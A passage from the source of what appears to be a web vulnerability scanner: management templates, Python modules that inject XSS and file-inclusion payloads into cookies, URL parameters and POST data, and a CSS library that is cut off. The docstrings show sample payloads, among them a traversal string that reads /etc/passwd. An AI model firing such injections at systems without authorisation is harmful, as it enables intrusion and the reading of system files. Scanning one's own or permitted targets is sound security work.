 44 |                     }
 45 |                 });
 46 |             },
 47 |             submit: function (event) {
 48 |                 event.preventDefault();
 49 |                 startLoading();
 50 |                 postApi('/api/scan/{{ type }}/update', this.exclusion, function (err, r) {
 51 |                     if (err) {
 52 |                         showError(err);
 53 |                         $('#error_alert').show();
 54 |                         setTimeout("$('#error_alert').hide()", 3000);
 55 |                     }
 56 |                     else {
 57 |                         if (r.result=='success'){
 58 |                             $('#update_success').show();
 59 |                             setTimeout("$('#update_success').hide()", 3000);
 60 |                         }
 61 |                         if (r.result=='failed'){
 62 |                             $('#update_failed').show();
 63 |                             setTimeout("$('#update_success').hide()", 3000);
 64 |                         }
 65 |                     }
 66 |                     stopLoading();
 67 |                 });
 68 | 
 69 |             }
 70 |         }
 71 |     });
 72 | }
 73 | 
 74 | $(function() {
 75 |     getApi('/api/scan/{{ type }}/view?page={{ page_index }}', function (err, results) {
 76 |         if (err) {
 77 |             return showError(err);
 78 |         }
 79 |         $('#div-loading').hide();
 80 |         initVM(results);
 81 |     });
 82 | });
 83 | 
 84 | </script>
 85 | 
 86 | {% endblock %}
 87 | 
 88 | {% block content %}
 89 | 
 90 |     <div class="uk-width-1-1">
 91 |         <div class="uk-container uk-container-center">
 92 |             <div data-uk-grid-margin="" class="uk-grid">
 93 |                 <div class="tm-sidebar uk-width-medium-1-4 uk-hidden-small uk-row-first">
 94 |                     <ul data-uk-nav="" class="tm-nav uk-nav">
 95 |                         <li class="uk-nav-header uk-text-large uk-text-bold">Exclusions</li>
 96 |                         <li><a href="/manage/exclusions/parse/view">Log Parse</a></li>
 97 |                         <li><a href="/manage/exclusions/cookie/view">Cookie Parameter</a></li>
 98 |                         <li><a href="/manage/exclusions/xss/view">XSS Scan</a></li>
 99 |                         <li><a href="/manage/exclusions/sqli/view">SQLi Scan</a></li>
100 | 
101 |                         <li class="uk-nav-header uk-text-large uk-text-bold">Scan Options</li>
102 |                         <li><a href="/manage/scan/sqlmap/view">SQLMAP Servers</a></li>
103 | 
104 |                         <li class="uk-nav-header uk-text-large uk-text-bold">System Options</li>
105 |                         <li><a href="grid.html">SMTP</a></li>
106 |                     </ul>
107 |                 </div>
108 |                 <div class="tm-main uk-width-medium-3-4">
109 |                     <div id="error_alert" class="uk-width-1-1"><div class="uk-alert uk-alert-danger uk-hidden"></div></div>
110 |                     <div id="div-scan" class="uk-width-1-1" style="display:none">
111 |                         <h1 v-if="type=='sqlmap'" class="uk-text-large uk-text-bold">SQLMAP Servers</h1>
112 |                         <a href="/manage/scan/sqlmap/add" class="uk-button uk-button-primary"><i class="uk-icon-plus"></i> Add</a>
113 |                         <table class="uk-table uk-table-hover">
114 |                             <thead>
115 |                                 <tr>
116 |                                     <th class="uk-width-3-10">Time</th>
117 |                                     <th class="uk-width-3-10">IP</th>
118 |                                     <th class="uk-width-2-10">Port</th>
119 |                                     <th class="uk-width-1-10">Status</th>
120 |                                     <th class="uk-width-1-10">Operations</th>
121 |                                 </tr>
122 |                             </thead>
123 |                             <tbody>
124 |                                 <tr v-repeat="sqlmap: sqlmaps" >
125 |                                     <td>
126 |                                         <span v-text="sqlmap.update_time"></span>
127 |                                     </td>
128 |                                     <td>
129 |                                         <span v-text="sqlmap.ip"></span>
130 |                                     </td>
131 |                                     <td>
132 |                                         <span v-text="sqlmap.port"></span>
133 |                                     </td>
134 |                                     <td>
135 |                                         <span v-if="sqlmap.status==1" class="uk-badge uk-badge-success">Enable</span>
136 |                                         <span v-if="sqlmap.status==2" class="uk-badge uk-badge-danger">Disable</span>
137 |                                     </td>
138 |                                     <td>
139 |                                         <a href="#0" v-on="click: edit_sqlmap(sqlmap)"><i class="uk-icon-edit"></i>
140 |                                         <a href="#0" v-on="click: delete_sqlmap(sqlmap)"><i class="uk-icon-trash-o"></i>
141 |                                     </td>
142 |                                 </tr>
143 |                             </tbody>
144 |                         </table>
145 |                         <div class="uk-width-1-1 uk-text-center">
146 |                             <ul class="uk-pagination">
147 |                                 <li v-if="! page.has_previous" class="uk-disabled"><span><i class="uk-icon-angle-double-left"></i></span></li>
148 |                                 <li v-if="page.has_previous"><a v-on="click: previous()" href="#0"><i class="uk-icon-angle-double-left"></i></a></li>
149 |                                 <li class="uk-active"><span v-text="page.page_index"></span></li>
150 |                                 <li v-if="! page.has_next" class="uk-disabled"><span><i class="uk-icon-angle-double-right"></i></span></li>
151 |                                 <li v-if="page.has_next"><a v-on="click: next()" href="#0"><i class="uk-icon-angle-double-right"></i></a></li>
152 |                             </ul>
153 |                         </div>
154 |                     </div>
155 |                 </div>
156 |             </div>
157 |         </div>
158 |     </div>
159 | 
160 |     <div id="div-loading" class="uk-width-1-1 uk-text-center">
161 |         <span><i class="uk-icon-spinner uk-icon-medium uk-icon-spin"></i> Loading...</span>
162 |     </div>
163 | {% endblock %}
164 | 


--------------------------------------------------------------------------------
/www/templates/manage_vulns_list.html:
--------------------------------------------------------------------------------
  1 | {% extends '__base__.html' %}
  2 | 
  3 | {% block title %}
  4 | Vulnerabilities -
  5 | {% if type == 'xss' %}XSS Scan
  6 | {% elif type == 'sqli' %}SQLi Scan
  7 | {% elif type == 'fi' %}FI Scan
  8 | {% else %}Unknown
  9 | {% endif %}
 10 | {% endblock %}
 11 | 
 12 | {% block beforehead %}
 13 | 
 14 | <script>
 15 | 
 16 | function initVM(data) {
 17 |     $('#div-requests').show();
 18 |     var vm = new Vue({
 19 |         el: '#div-requests',
 20 |         data: {
 21 |             requests: data.requests,
 22 |             page: data.page,
 23 |             type: data.type,
 24 |         },
 25 |         methods: {
 26 |             previous: function () {
 27 |                 gotoPage(this.page.page_index - 1);
 28 |             },
 29 |             next: function () {
 30 |                 gotoPage(this.page.page_index + 1);
 31 |             },
 32 |             view_request: function (request) {
 33 |                 var url = '/manage/requests/' + request.rid + '/view';
 34 |                 location.href = url;
 35 |             }
 36 |         }
 37 |     });
 38 | }
 39 | 
 40 | $(function() {
 41 |     getApi('/api/vulns/{{ type }}/list?page={{ page_index }}', function (err, results) {
 42 |         if (err) {
 43 |             return showError(err);
 44 |         }
 45 |         $('#div-loading').hide();
 46 |         initVM(results);
 47 |     });
 48 | });
 49 | 
 50 | </script>
 51 | 
 52 | {% endblock %}
 53 | 
 54 | {% block content %}
 55 | 
 56 |     <div class="uk-width-1-1">
 57 |         <div class="uk-alert uk-alert-danger uk-hidden"></div>
 58 |     </div>
 59 | 
 60 |     <div class="uk-width-1-1">
 61 |         <div class="uk-container uk-container-center">
 62 |             <div data-uk-grid-margin="" class="uk-grid">
 63 |                 <div class="tm-sidebar uk-width-medium-1-4 uk-hidden-small uk-row-first">
 64 |                     <ul data-uk-nav="" class="tm-nav uk-nav">
 65 |                         <li class="uk-nav-header uk-text-large uk-text-bold">Vulnerabilities</li>
 66 |                         <li><a href="/manage/vulns/xss/list">Crosss Site Scripting (XSS)</a></li>
 67 |                         <li><a href="/manage/vulns/sqli/list">SQL Injection</a></li>
 68 |                         <li><a href="/manage/vulns/fi/list">File Inclusion</a></li>
 69 |                     </ul>
 70 |                 </div>
 71 |                 <div class="tm-main uk-width-medium-3-4">
 72 |                     <div id="div-requests" class="uk-width-1-1" style="display:none">
 73 |                         <h1 v-if="type=='xss'" class="uk-text-large uk-text-bold">Crosss Site Scripting (XSS)</h1>
 74 |                         <h1 v-if="type=='sqli'" class="uk-text-large uk-text-bold">SQL Injection</h1>
 75 |                         <h1 v-if="type=='fi'" class="uk-text-large uk-text-bold">File Inclusion</h1>
 76 |                         <p class="uk-text-success">The following are the scan results.</p>
 77 |                         <table class="uk-table uk-table-hover">
 78 |                             <thead>
 79 |                                 <tr>
 80 |                                   <th class="uk-width-1-10">ID</th>
 81 |                                   <th class="uk-width-2-10">Time</th>
 82 |                                   <th class="uk-width-1-10">Method</th>
 83 |                                   <th class="uk-width-1-10">Protocol</th>
 84 |                                   <th class="uk-width-1-10">Port</th>
 85 |                                   <th class="uk-width-2-10">Host</th>
 86 |                                   <th class="uk-width-1-10">Status</th>
 87 |                                   <th class="uk-width-1-10">View</th>
 88 |                                 </tr>
 89 |                             </thead>
 90 |                             <tbody>
 91 |                                 <tr v-repeat="request: requests" >
 92 |                                     <td>
 93 |                                         <span v-text="request.id"></span>
 94 |                                     </td>
 95 |                                     <td>
 96 |                                         <span v-text="request.update_time"></span>
 97 |                                     </td>
 98 |                                     <td>
 99 |                                         <span v-text="request.method"></span>
100 |                                     </td>
101 |                                     <td>
102 |                                         <span v-text="request.protocol"></span>
103 |                                     </td>
104 |                                     <td>
105 |                                         <span v-text="request.port"></span>
106 |                                     </td>
107 |                                     <td>
108 |                                         <!--<span v-model="request.protocol+'://'+request.host+request.path"></span>-->
109 |                                         <span v-model="request.host"></span>
110 |                                     </td>
111 |                                     <td>
112 |                                         <span v-if="type=='xss' && request.result_xss=='vulnerable'" class="uk-badge uk-badge-danger">vulnerable</span></dd>
113 |                                         <span v-if="type=='xss' && request.result_xss=='not vulnerable'" class="uk-badge uk-badge-success">not vulnerable</span></dd>
114 |                                         <span v-if="type=='xss' && request.result_xss=='not scan yet'" class="uk-badge uk-badge-warning">not scan yet</span></dd>
115 | 
116 |                                         <span v-if="type=='sqli' && request.result_sqli=='vulnerable'" class="uk-badge uk-badge-danger">vulnerable</span></dd>
117 |                                         <span v-if="type=='sqli' && request.result_sqli=='not vulnerable'" class="uk-badge uk-badge-success">not vulnerable</span></dd>
118 |                                         <span v-if="type=='sqli' && request.result_sqli=='not scan yet'" class="uk-badge uk-badge-warning">not scan yet</span></dd>
119 | 
120 |                                         <span v-if="type=='fi' && request.result_fi=='vulnerable'" class="uk-badge uk-badge-danger">vulnerable</span></dd>
121 |                                         <span v-if="type=='fi' && request.result_fi=='not vulnerable'" class="uk-badge uk-badge-success">not vulnerable</span></dd>
122 |                                         <span v-if="type=='fi' && request.result_fi=='not scan yet'" class="uk-badge uk-badge-warning">not scan yet</span></dd>
123 |                                     </td>
124 |                                     <td>
125 |                                         <a href="#0" v-on="click: view_request(request)"><i class="uk-icon-eye"></i>
126 |                                     </td>
127 |                                 </tr>
128 |                             </tbody>
129 |                         </table>
130 |                         <div class="uk-width-1-1 uk-text-center">
131 |                             <ul class="uk-pagination">
132 |                                 <li v-if="! page.has_previous" class="uk-disabled"><span><i class="uk-icon-angle-double-left"></i></span></li>
133 |                                 <li v-if="page.has_previous"><a v-on="click: previous()" href="#0"><i class="uk-icon-angle-double-left"></i></a></li>
134 |                                 <li class="uk-active"><span v-text="page.page_index"></span></li>
135 |                                 <li v-if="! page.has_next" class="uk-disabled"><span><i class="uk-icon-angle-double-right"></i></span></li>
136 |                                 <li v-if="page.has_next"><a v-on="click: next()" href="#0"><i class="uk-icon-angle-double-right"></i></a></li>
137 |                             </ul>
138 |                         </div>
139 |                     </div>
140 |                 </div>
141 |             </div>
142 |         </div>
143 |     </div>
144 | 
145 |     <div id="div-loading" class="uk-width-1-1 uk-text-center">
146 |         <span><i class="uk-icon-spinner uk-icon-medium uk-icon-spin"></i> Loading...</span>
147 |     </div>
148 | {% endblock %}
149 | 


--------------------------------------------------------------------------------
/scanner/scan_xss.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | 
  3 | """ XSS Scanner
  4 | 
  5 | This module provides functions that scan XSS.
  6 | 
  7 | """
  8 | 
  9 | import requests
 10 | import re
 11 | import time
 12 | from lib.db_operation import db_query, update_scan_result, fetch_request, get_request_info, is_checked_vulnerable, fetch_exclusion_scan, get_scan_exclusion_info, fetch_exclusion_cookie, get_cookie_exclusion_info
 13 | from lib.utils import highlight
 14 | from lib.hack_requests import HackRequests
 15 | 
 16 | 
 17 | # Define Lib for HackRequests class
 18 | LIB_1 = 'PHANTOMJS'
 19 | LIB_2 = 'REQUESTS'
 20 | 
 21 | # Fetch the exclusions for cookie parameters from database
 22 | cookie_exclusion = get_cookie_exclusion_info(fetch_exclusion_cookie()[0])
 23 | 
 24 | # Load payloads from file into a list for scan
 25 | payloads = []
 26 | lines = open('payloads/xss.txt','rb')
 27 | for line in lines:
 28 |     payloads.append(line.strip())
 29 | lines.close()
 30 | 
 31 | def verify_xss(rhtml, verification):
 32 |     if verification in rhtml:
 33 |         result = 'vulnerable'
 34 |     else:
 35 |         result = 'not vulnerable'
 36 |     return result
 37 | 
 38 | def print_scan_result(type, response, payload_str, verification, request_info):
 39 |     """ Print Scan Result
 40 | 
 41 |         Args:
 42 |             type: Type of POC, it is a string, e.g. "Cookie", "Path", "Post"
 43 |             response: The response content of request
 44 |             payload_str: The real payload of XSS based on parameters, it is a string, e.g. "value=<script>alert(1)</script>"
 45 |             verification: The verification of XSS, it can be a string or list
 46 |             request_info: The info of request, it is a dict
 47 | 
 48 |     """
 49 |     result_xss = ""
 50 |     if response:
 51 |         res = "[XSS] request id: {}\n\t[-] host: {}\n\t[-] method: {}\n\t[-] payload: {}\n\n[*] result: {}\n\n".format(request_info['rid'], request_info['host'], request_info['method'], payload_str, verify_xss(response, verification))
 52 |         result_xss = verify_xss(response, verification)
 53 |     else:
 54 |         res = "[XSS] request id: {}\n\t[-] host: {}\n\t[-] method: {}\n\t[-] payload: {}\n\n[*] result: {}\n\n".format(request_info['rid'], request_info['host'], request_info['method'], payload_str, "not vulnerable")
 55 |         result_xss = "not vulnerable"
 56 |     poc_xss = "{}: {}".format(type, payload_str)
 57 |     update_scan_result(request_info['rid'], 'scan_xss', 'result_xss', result_xss, 'poc_xss', poc_xss, 'response_xss', response)
 58 |     print highlight(res, 'green')
 59 |     return result_xss
 60 | 
 61 | 
 62 | def scan_request_from_cookie(request_info):
 63 |     """ Scan all cookies except exclusions in list 'cookie_exclusion' for GET/POST request
 64 | 
 65 |     Examples:
 66 |         POST /dvwa/login.php HTTP/1.1
 67 |         Host: test.avfisher.win
 68 |         Cookie: security=low; PHPSESSID=a93qmi370veagks0j81k3rlu32
 69 | 
 70 |         Cookies:
 71 |             security
 72 |             PHPSESSID
 73 | 
 74 |     """
 75 | 
 76 |     cookie = request_info['cookie']
 77 |     if cookie:
 78 |         cookies = cookie.split('; ')
 79 |         for ck in cookies:
 80 |             if ck and ck.strip().split('=', 1)[0].lower() not in cookie_exclusion:
 81 |                 for payload in payloads:
 82 |                     payload_cookie = "{}{}".format(ck, payload)
 83 |                     cookie_str = cookie.replace(ck, payload_cookie)
 84 |                     request_info['cookie'] = cookie_str.strip()
 85 |                     type = "Cookie"
 86 |                     if request_info['method'] == "GET":
 87 |                         r_1 = HackRequests(request_info, LIB_1).get_request()
 88 |                         r_2 = HackRequests(request_info, LIB_2).get_request()
 89 |                         if print_scan_result(type, r_1, cookie_str, payload, request_info) == "vulnerable" or print_scan_result(type, r_2, cookie_str, payload, request_info) == "vulnerable":
 90 |                             break
 91 |                     elif request_info['method'] == "POST":
 92 |                         r = HackRequests(request_info).post_request()
 93 |                         if print_scan_result(type, r, cookie_str, payload, request_info) == "vulnerable":
 94 |                             break
 95 | 
 96 | def scan_get_request_from_path(request_info):
 97 |     """Scan all parameters in url for GET request
 98 | 
 99 |     Examples:
100 |         GET /dvwa/vulnerabilities/xss_r/?name=helloworld HTTP/1.1
101 |         Host: test.avfisher.win
102 |         Cookie: security=low; PHPSESSID=a93qmi370veagks0j81k3rlu32
103 | 
104 |         Parameters in URL:
105 |             name
106 | 
107 |     """
108 | 
109 |     path = request_info['path']
110 |     #if "?" in path and "&" in path:
111 |     if path and "?" in path:  # Example of path: http://abc.xyz/index.html?para=test
112 |         paras = path.split('?')[-1].split('&')
113 |         for para in paras:
114 |             if para:
115 |                 for payload in payloads:
116 |                     payload_para = "{}{}".format(para, payload)
117 |                     path_str = path.replace(para, payload_para)
118 |                     request_info['path'] = path_str.strip()
119 |                     type = "Path"
120 |                     r_1 = HackRequests(request_info, LIB_1).get_request()
121 |                     r_2 = HackRequests(request_info, LIB_2).get_request()
122 |                     if print_scan_result(type, r_1, path_str, payload, request_info) == "vulnerable" or print_scan_result(type, r_2, path_str, payload, request_info) == "vulnerable":
123 |                         break
124 | 
125 | def scan_post_request_from_post_data(request_info):
126 |     """Scan all parameters in post data for POST request
127 | 
128 |     Examples:
129 |         POST /dvwa/vulnerabilities/xss_s/ HTTP/1.1
130 |         Host: test.avfisher.win
131 |         Cookie: security=impossible; security=low; PHPSESSID=a93qmi370veagks0j81k3rlu32
132 |         Post Data:txtName=whatsup&mtxMessage=man&btnSign=Sign+Guestbook&user_token=b1ce437384e1bb75bdc8a3f02babe157
133 | 
134 |         Parameters in post data:
135 |             txtName
136 |             mtxMessage
137 |             btnSign
138 |             user_token
139 | 
140 |     """
141 | 
142 |     post_data = request_info['post_data']
143 |     if post_data and "&" in post_data:
144 |         paras = request_info['post_data'].split('&')
145 |         for para in paras:
146 |             if para:
147 |                 for payload in payloads:
148 |                     payload_para = "{}{}".format(para, payload)
149 |                     post_data_str = post_data.replace(para, payload_para)
150 |                     request_info['post_data'] = post_data_str.strip()
151 |                     type = "Post"
152 |                     r = HackRequests(request_info).post_request()
153 |                     if print_scan_result(type, r, post_data_str, payload, request_info) == "vulnerable":
154 |                         break
155 | 
156 | def scan_get_request(request_info):
157 |     if not is_checked_vulnerable(request_info['rid'], 'result_xss'):
158 |         scan_request_from_cookie(request_info)
159 |         scan_get_request_from_path(request_info)
160 | 
161 | def scan_post_request(request_info):
162 |     if not is_checked_vulnerable(request_info['rid'], 'result_xss'):
163 |         scan_request_from_cookie(request_info)
164 |         scan_post_request_from_post_data(request_info)
165 | 
166 | def scanner(request):
167 |     request_info = get_request_info(request)
168 |     if request_info['method'] == "GET":
169 |         scan_get_request(request_info)
170 |     elif request_info['method'] == "POST":
171 |         scan_post_request(request_info)
172 | 
173 | def main():
174 |     exclude = get_scan_exclusion_info(fetch_exclusion_scan(0)[0])
175 |     limit_num = 10000 # Number of limit of requests
176 |     scan_type = 'scan_xss'
177 |     requests = fetch_request(exclude, scan_type, limit_num)
178 |     if requests:
179 |         for request in requests:
180 |             try:
181 |                 scanner(request)
182 |             except Exception, err:
183 |                 print highlight("[!] scanner failed: {}".format(str(err)), 'red')
184 |                 pass
185 |     else:
186 |         print highlight("[!] no new request found", 'yellow')
187 | 
188 | 
189 | if __name__ == "__main__":
190 |     while True:
191 |         now = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
192 |         delim = '.............................................'
193 |         print "[*][{}] Time: {}\n{}".format('XSS Scan', highlight(str(now), 'green'), delim)
194 |         main()
195 |         time.sleep(5)
196 |         print delim, '\n'
197 | 


--------------------------------------------------------------------------------
/scanner/scan_fi.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | 
  3 | """ LFI/RFI Scanner
  4 | 
  5 | This module provides functions that scan LFI (Local File Inclusion)/RFI (Remote File Inclusion).
  6 | 
  7 | """
  8 | 
  9 | import requests
 10 | import re
 11 | import time
 12 | from lib.db_operation import db_query, update_scan_result, fetch_request, get_request_info, is_checked_vulnerable, fetch_exclusion_scan, get_scan_exclusion_info, fetch_exclusion_cookie, get_cookie_exclusion_info
 13 | from lib.utils import highlight
 14 | from lib.hack_requests import HackRequests
 15 | 
 16 | 
 17 | # Define Lib for HackRequests class
 18 | LIB = 'REQUESTS'
 19 | 
 20 | # Fetch the exclusions for cookie parameters from database
 21 | cookie_exclusion = get_cookie_exclusion_info(fetch_exclusion_cookie()[0])
 22 | 
 23 | # Load payloads from file into a list for scan
 24 | payloads = []
 25 | lines = open('payloads/fi.txt','rb')
 26 | for line in lines:
 27 |     payloads.append(line.strip())
 28 | lines.close()
 29 | 
 30 | # Load verifications from file into a list for scan
 31 | verifications = []
 32 | verify_file = open('payloads/fi_verify.txt','rb')
 33 | for line in verify_file:
 34 |     verifications.append(line.strip())
 35 | verify_file.close()
 36 | 
 37 | def verify_fi(rhtml, verifications):
 38 |     result = 'not vulnerable'
 39 |     for verification in verifications:
 40 |         if verification in rhtml:
 41 |             result = 'vulnerable'
 42 |             return result
 43 |     return result
 44 | 
 45 | def print_scan_result(type, response, payload_str, verification, request_info):
 46 |     """ Print Scan Result
 47 | 
 48 |         Args:
 49 |             type: Type of POC, it is a string, e.g. "Cookie", "Path", "Post"
 50 |             response: The response content of request
 51 |             payload_str: The real payload of FI based on parameters, it is a string, e.g. "file=../../../../../../../../../../../../../../../etc/passwd%00"
 52 |             verification: The verification of FI, it can be a string or list
 53 |             request_info: The info of request, it is a dict
 54 | 
 55 |     """
 56 |     result_fi = ""
 57 |     if response:
 58 |         res = "[FI] request id: {}\n\t[-] host: {}\n\t[-] method: {}\n\t[-] payload: {}\n\n[*] result: {}\n\n".format(request_info['rid'], request_info['host'], request_info['method'], payload_str, verify_fi(response, verification))
 59 |         result_fi = verify_fi(response, verification)
 60 |     else:
 61 |         res = "[FI] request id: {}\n\t[-] host: {}\n\t[-] method: {}\n\t[-] payload: {}\n\n[*] result: {}\n\n".format(request_info['rid'], request_info['host'], request_info['method'], payload_str, "not vulnerable")
 62 |         result_fi = "not vulnerable"
 63 |     poc_fi = "{}: {}".format(type, payload_str)
 64 |     update_scan_result(request_info['rid'], 'scan_fi', 'result_fi', result_fi, 'poc_fi', poc_fi, 'response_fi', response)
 65 |     print highlight(res, 'green')
 66 |     return result_fi
 67 | 
 68 | def scan_request_from_cookie(request_info):
 69 |     """ Scan all cookies except exclusions in list 'cookie_exclusion' for GET/POST request
 70 | 
 71 |     Examples:
 72 |         POST /dvwa/login.php HTTP/1.1
 73 |         Host: test.avfisher.win
 74 |         Cookie: security=low; PHPSESSID=a93qmi370veagks0j81k3rlu32
 75 | 
 76 |         Cookies:
 77 |             security
 78 |             PHPSESSID
 79 | 
 80 |     """
 81 | 
 82 |     cookie = request_info['cookie']
 83 |     if cookie:
 84 |         cookies = cookie.split('; ')
 85 |         for ck in cookies:
 86 |             if ck and ck.strip().split('=', 1)[0].lower() not in cookie_exclusion:
 87 |                 for payload in payloads:
 88 |                     #payload_cookie = "{}{}".format(ck, payload)
 89 |                     payload_cookie = "{}={}".format(ck.split('=', 1)[0], payload)
 90 |                     cookie_str = cookie.replace(ck, payload_cookie)
 91 |                     request_info['cookie'] = cookie_str.strip()
 92 |                     type = "Cookie"
 93 |                     if request_info['method'] == "GET":
 94 |                         r = HackRequests(request_info, LIB).get_request()
 95 |                         if print_scan_result(type, r, cookie_str, verifications, request_info) == "vulnerable":
 96 |                             break
 97 |                     elif request_info['method'] == "POST":
 98 |                         r = HackRequests(request_info).post_request()
 99 |                         if print_scan_result(type, r, cookie_str, verifications, request_info) == "vulnerable":
100 |                             break
101 | 
102 | def scan_get_request_from_path(request_info):
103 |     """Scan all parameters in url for GET request
104 | 
105 |     Examples:
106 |         GET /dvwa/vulnerabilities/xss_r/?name=helloworld HTTP/1.1
107 |         Host: test.avfisher.win
108 |         Cookie: security=low; PHPSESSID=a93qmi370veagks0j81k3rlu32
109 | 
110 |         Parameters in URL:
111 |             name
112 | 
113 |     """
114 | 
115 |     path = request_info['path']
116 |     #if "?" in path and "&" in path:
117 |     if path and "?" in path:  # Example of path: http://abc.xyz/index.html?para=test
118 |         paras = path.split('?')[-1].split('&')
119 |         for para in paras:
120 |             for payload in payloads:
121 |                 #payload_para = "{}{}".format(para, payload)
122 |                 payload_para = "{}={}".format(para.split('=', 1)[0], payload)
123 |                 path_str = path.replace(para, payload_para)
124 |                 request_info['path'] = path_str.strip()
125 |                 type = "Path"
126 |                 r = HackRequests(request_info, LIB).get_request()
127 |                 if print_scan_result(type, r, path_str, verifications, request_info) == "vulnerable":
128 |                     break
129 | 
130 | def scan_post_request_from_post_data(request_info):
131 |     """Scan all parameters in post data for POST request
132 | 
133 |     Examples:
134 |         POST /dvwa/vulnerabilities/xss_s/ HTTP/1.1
135 |         Host: test.avfisher.win
136 |         Cookie: security=impossible; security=low; PHPSESSID=a93qmi370veagks0j81k3rlu32
137 |         Post Data:txtName=whatsup&mtxMessage=man&btnSign=Sign+Guestbook&user_token=b1ce437384e1bb75bdc8a3f02babe157
138 | 
139 |         Parameters in post data:
140 |             txtName
141 |             mtxMessage
142 |             btnSign
143 |             user_token
144 | 
145 |     """
146 | 
147 |     post_data = request_info['post_data']
148 |     if post_data and "&" in post_data:
149 |         paras = request_info['post_data'].split('&')
150 |         for para in paras:
151 |             if para:
152 |                 for payload in payloads:
153 |                     #payload_para = "{}{}".format(para, payload)
154 |                     payload_para = "{}={}".format(para.split('=', 1)[0], payload)
155 |                     post_data_str = post_data.replace(para, payload_para)
156 |                     request_info['post_data'] = post_data_str.strip()
157 |                     type = "Post"
158 |                     r = HackRequests(request_info).post_request()
159 |                     if print_scan_result(type, r, post_data_str, verifications, request_info) == "vulnerable":
160 |                         break
161 | 
162 | def scan_get_request(request_info):
163 |     if not is_checked_vulnerable(request_info['rid'], 'result_fi'):
164 |         #scan_request_from_cookie(request_info)
165 |         scan_get_request_from_path(request_info)
166 | 
167 | def scan_post_request(request_info):
168 |     if not is_checked_vulnerable(request_info['rid'], 'result_fi'):
169 |         #scan_request_from_cookie(request_info)
170 |         scan_post_request_from_post_data(request_info)
171 | 
172 | def scanner(request):
173 |     request_info = get_request_info(request)
174 |     if request_info['method'] == "GET":
175 |         scan_get_request(request_info)
176 |     elif request_info['method'] == "POST":
177 |         scan_post_request(request_info)
178 | 
179 | def main():
180 |     exclude = get_scan_exclusion_info(fetch_exclusion_scan(2)[0]) # 2 means exclusion type is FI(File Inclusion)
181 |     limit_num = 10000 # Number of limit of requests
182 |     scan_type = 'scan_fi'
183 |     requests = fetch_request(exclude, scan_type, limit_num)
184 |     if requests:
185 |         for request in requests:
186 |             try:
187 |                 scanner(request)
188 |             except Exception, err:
189 |                 print highlight("[!] scanner failed: {}".format(str(err)), 'red')
190 |                 pass
191 |     else:
192 |         print highlight("[!] no new request found", 'yellow')
193 | 
194 | 
195 | if __name__ == "__main__":
196 |     while True:
197 |         now = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
198 |         delim = '.............................................'
199 |         print "[*][{}] Time: {}\n{}".format('LFI/RFI Scan', highlight(str(now), 'green'), delim)
200 |         main()
201 |         time.sleep(5)
202 |         print delim, '\n'
203 | 


--------------------------------------------------------------------------------
/www/static/css/addons/uikit.addons.min.css:
--------------------------------------------------------------------------------
1 | /*! UIkit 2.6.0 | http://www.getuikit.com | (c) 2014 YOOtheme | MIT License */
2 | 
3 | .uk-dotnav{padding:0;list-style:none;font-size:0}.uk-dotnav>li{display:inline-block;font-size:1rem;vertical-align:top}.uk-dotnav>li:nth-child(n+2){margin-left:15px}.uk-dotnav>li>a{display:inline-block;-moz-box-sizing:content-box;box-sizing:content-box;width:20px;height:20px;border-radius:50%;background:rgba(50,50,50,.1);vertical-align:top;overflow:hidden;text-indent:-999%}.uk-dotnav>li>a:hover,.uk-dotnav>li>a:focus{background:rgba(50,50,50,.4);outline:0}.uk-dotnav>li>a:active{background:rgba(50,50,50,.6)}.uk-dotnav>li.uk-active>a{background:rgba(50,50,50,.4)}.uk-dotnav-vertical>li{display:block}.uk-dotnav-vertical>li:nth-child(n+2){margin-left:0;margin-top:15px}.uk-slidenav{display:inline-block;-moz-box-sizing:border-box;box-sizing:border-box;width:60px;height:60px;line-height:60px;color:rgba(50,50,50,.4);font-size:60px;text-align:center}.uk-slidenav:hover,.uk-slidenav:focus{outline:0;text-decoration:none;color:rgba(50,50,50,.7);cursor:pointer}.uk-slidenav:active{color:rgba(50,50,50,.9)}.uk-slidenav-previous:before{content:"\f104";font-family:FontAwesome}.uk-slidenav-next:before{content:"\f105";font-family:FontAwesome}.uk-slidenav-position{display:inline-block;-moz-box-sizing:border-box;box-sizing:border-box;max-width:100%;position:relative}.uk-slidenav-position .uk-slidenav{display:none;position:absolute;top:50%;margin-top:-30px}.uk-slidenav-position:hover .uk-slidenav{display:block}.uk-slidenav-position .uk-slidenav-previous{left:20px}.uk-slidenav-position .uk-slidenav-next{right:20px}.uk-form-file{position:relative;display:inline-block;vertical-align:middle;overflow:hidden}.uk-form-file input[type=file]{position:absolute;top:0;bottom:0;z-index:1;width:100%;opacity:0;cursor:pointer;left:0;font-size:500px}.uk-form-password{position:relative;display:inline-block;max-width:100%}.uk-form-password-toggle{display:block;position:absolute;top:50%;right:10px;margin-top:-6px;font-size:13px;line-height:13px;color:#999}.uk-form-password-toggle:hover{color:#999;text-decoration:none}.uk-form-password>input{padding-right:50px!important}.uk-placeholder{margin-bottom:15px;padding:20px;border:1px dashed #ddd;background:#fafafa;color:#444}*+.uk-placeholder{margin-top:15px}.uk-placeholder>:last-child{margin-bottom:0}.uk-placeholder-large{padding-top:80px;padding-bottom:80px}.uk-autocomplete{display:inline-block;vertical-align:middle;position:relative}.uk-nav-autocomplete>li>a{color:#444}.uk-nav-autocomplete>li.uk-active>a{background:#00a8e6;color:#fff;outline:0}.uk-nav-autocomplete .uk-nav-header{color:#999}.uk-nav-autocomplete .uk-nav-divider{border-top:1px solid #ddd}.uk-datepicker{width:auto}.uk-datepicker-nav{margin-bottom:15px;text-align:center;line-height:20px}.uk-datepicker-nav:before,.uk-datepicker-nav:after{content:" ";display:table}.uk-datepicker-nav:after{clear:both}.uk-datepicker-nav a{color:#444;text-decoration:none}.uk-datepicker-nav a:hover{color:#444}.uk-datepicker-previous{float:left}.uk-datepicker-next{float:right}.uk-datepicker-previous:after,.uk-datepicker-next:after{width:20px;font-family:FontAwesome}.uk-datepicker-previous:after{content:"\f053"}.uk-datepicker-next:after{content:"\f054"}.uk-datepicker-table{width:100%}.uk-datepicker-table th,.uk-datepicker-table td{padding:2px}.uk-datepicker-table th{font-size:12px}.uk-datepicker-table a{display:block;width:26px;line-height:24px;text-align:center;color:#444;text-decoration:none}a.uk-datepicker-table-muted{color:#999}.uk-datepicker-table a:hover,.uk-datepicker-table 